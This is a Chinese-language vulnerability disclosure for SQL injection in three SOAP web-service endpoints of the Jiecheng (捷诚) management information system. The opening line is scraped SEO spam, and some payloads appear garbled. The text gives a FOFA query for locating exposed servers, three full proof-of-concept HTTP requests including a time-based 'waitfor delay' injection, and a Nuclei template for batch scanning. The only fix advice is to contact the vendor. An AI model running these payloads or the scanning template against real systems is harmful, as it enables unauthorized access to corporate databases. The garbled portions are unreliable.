网站建设氵金手指下拉,部门网站的开发 意义,做公益选哪个网站好,网站建设的需求文档免责声明#xff1a;
文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…免责声明
文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责
一漏洞描述
捷诚管理信息系统是一款功能全面可以支持自营、联营到外柜租赁的管理其自身带工作流管理工具能够帮助企业有效的开展内部审批工作。该产品CWSFinanceCommon.asmx、CWSHr.asmx、cwsoa.asmx多处接口存在SQL注入。
二漏洞影响版本
全版本
三网络空间测绘查询
fofa: body/Scripts/EnjoyMsg.js
四漏洞复现 POC1:
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charsetutf-8
Accept-Encoding: gzip?xml version1.0 encodingutf-8?
soap:Envelope xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xmlns:xsdhttp://www.w3.org/2001/XMLSchema xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/soap:BodyGetOSpById xmlnshttp://tempuri.org/sId1;waitfor delay 0:0:5--/sId/GetOSpById/soap:Body
/soap:Envelope延时注入5秒 POC2
POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Connection: close
SOAPAction: http://tempuri.org/GetLeaveReqById
Content-Type: text/xml;charsetUTF-8
Content-Length: 316soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:temhttp://tempuri.org/soapenv:Header/soapenv:Bodytem:GetLeaveReqById!--type: string--tem:sIdgero et/tem:sId/tem:GetLeaveReqById/soapenv:Body
/soapenv:EnvelopePOC3:
POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Host: x.x.x.x
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
SOAPAction: http://tempuri.org/GetOAById
Content-Type: text/xml;charsetUTF-8
Content-Length: 276soap:Envelope xmlns:soaphttp://www.w3.org/2003/05/soap-envelope xmlns:temhttp://tempuri.org/soap:Header/soap:Bodytem:GetOAById!--type: string--tem:sIdgero et/tem:sId/tem:GetOAById/soap:Body
/soap:Envelope五批量验证
id: jiecheng-CWSFinanceCommon-sqliinfo:name: 捷诚管理信息系统 CWSFinanceCommon.asmx SQL注入漏洞author: fgzseverity: highdescription: 捷诚管理信息系统是一款功能全面可以支持自营、联营到外柜租赁的管理其自身带工作流管理工具能够帮助企业有效的开展内部审批工作。该系统CWSFinanceCommon.asmx 存在sql注入漏洞。黑客可以通过该漏洞获取数据库敏感信息甚至远控服务器。tags: 2023,jiecheng,sqlimetadata:max-request: 3fofa-query: body/Scripts/EnjoyMsg.jsverified: truehttp:- method: POSTpath:- {{BaseURL}}/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmxheaders:Content-Type: text/xml; charsetutf-8body: ?xml version\1.0\ encoding\utf-8\?\nsoap:Envelope xmlns:xsi\\http://www.w3.org/2001/XMLSchema-instance\ xmlns:xsd\http://www.w3.org/2001/XMLSchema\\\ xmlns:soap\http://schemas.xmlsoap.org/soap/envelope/\\n soap:Body\n\\ GetOSpById xmlns\http://tempuri.org/\\n sId1;waitfor delay\\ 0:0:5--/sId\n /GetOSpById\n /soap:Body\n/soap:Envelopematchers:- type: dsldsl:- status_code 200 duration5 duration6六修复建议
联系厂家获取修复补丁。
